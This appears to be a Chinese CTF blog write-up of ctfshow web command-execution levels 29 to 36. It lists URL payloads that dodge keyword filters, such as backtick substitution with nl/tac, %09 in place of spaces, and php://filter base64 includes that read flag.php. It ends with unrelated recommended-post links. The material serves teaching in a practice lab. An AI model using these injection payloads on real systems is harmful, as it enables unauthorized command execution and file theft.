ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET"1"?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET1?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
网络小白不怕黑14 分钟前
监控httpd状态
服务器
阿米亚波1 小时前
【EVE-NG 实战】防火墙基础(VLAN · VRRP · NAT · ACL · 静态路由)
运维·网络·笔记·网络协议·计算机网络·网络安全·运维开发
日取其半万世不竭2 小时前
云服务器迁移怎么少停机?DNS 切换前后的完整清单
运维·服务器
FREEDOM_X2 小时前
Linux 多线程编程——总结
java·linux·运维·ubuntu
名字还没想好☜2 小时前
Docker 多阶段构建:把镜像从 1.2GB 砍到 15MB
运维·docker·容器·多阶段构建·镜像优化
祸心依旧2 小时前
Visual Studio 五月更新 —— 计划、评审、优化
运维·人工智能·visual studio
Web4Browser2 小时前
Headless 浏览器自动化适合哪些任务?巡检、截图和提交动作要分级
运维·前端·自动化
難釋懷3 小时前
Nginx浏览器强制缓存
运维·nginx·缓存
大博士.J3 小时前
视频号主体违规与认证上限?正确的解决方式
运维·python·自动化
山东点狮信息科技有限公司3 小时前
企业级应用双模式部署架构设计:从单体到微服务的平滑演进
运维·微服务·架构